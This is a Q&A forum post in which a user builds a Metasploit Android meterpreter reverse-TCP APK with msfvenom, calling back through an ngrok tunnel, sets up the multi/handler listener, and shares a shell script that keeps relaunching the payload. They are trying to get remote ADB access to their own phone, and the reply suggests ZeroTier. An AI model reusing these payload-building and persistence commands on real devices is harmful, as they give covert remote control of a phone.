Reputation: 1
Connect to ADB with ngrok and reverse tcp
I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy. However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk
then I set up the reverse tcp handler in msfconsole:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit
After this I install and run the apk on my device, then meterpreter opens the session;
[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100
and the ngrok console shows up 1 connection (my device). But if I try to add the ngrok server to adb like this:
adb connect "ngrok address"
(there I tried the ngrok tcp link, and 127.0.0.1 with both ports, none of them works) I get the following error: failed to connect to '127.0.0.1:25565': Connection refused I could make a vpn on my local network, but the power usually goes down, so the vpn is a dead end. what am I doing wrong? or adb can't connect with ngrok?
My second issue is, that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on or if the power goes out the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?
Update: I made an shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open an reverse tcp (and keep it open), and if there is change in the internet connection then reconnect automatically.
Btw, here is the script that i wrote:
#!/bin/sh
# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
# wait 20 seconds before trying again
sleep 20
done
# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# run the activity every 10 minutes
while true
do
sleep 600
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done
Upvotes: -1
Views: 1331
Answers (1)
Reputation: 116
I am convinced that it is not possible to connect a device using reverse meterpreter shell because ADB requires a raw TCP connection rather than meterpreter shell.
You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to VPN, but traffic is routed directly rather than through a centralized VPN server.
This post describes how to connect adb using TCPIP in detail.
Upvotes: 0
Related Questions
- Error 28000: Login failed for user DOMAIN\\user with pyodbc
- Python pyodbc connect to Sql Server using SQL Server Authentication
- How to I connect to an On-Prem SQL server using pyodbc using a Service Account (not my own AD account)
- Python - Pyodbc Connection error
- Python ODBC Connect to SQL Server with Service Account (trusted_connection=no)
- Unable to connect to a remote MS SQL Server and access it's database via. python
- Need help in fixing sql connection issue using service account though pyodbc
- Connecting to MS-SQL from pyodbc using windows authentication
- Connect to SQL Server using pyodbc
- Connect to SQL Server with user credentials of another domain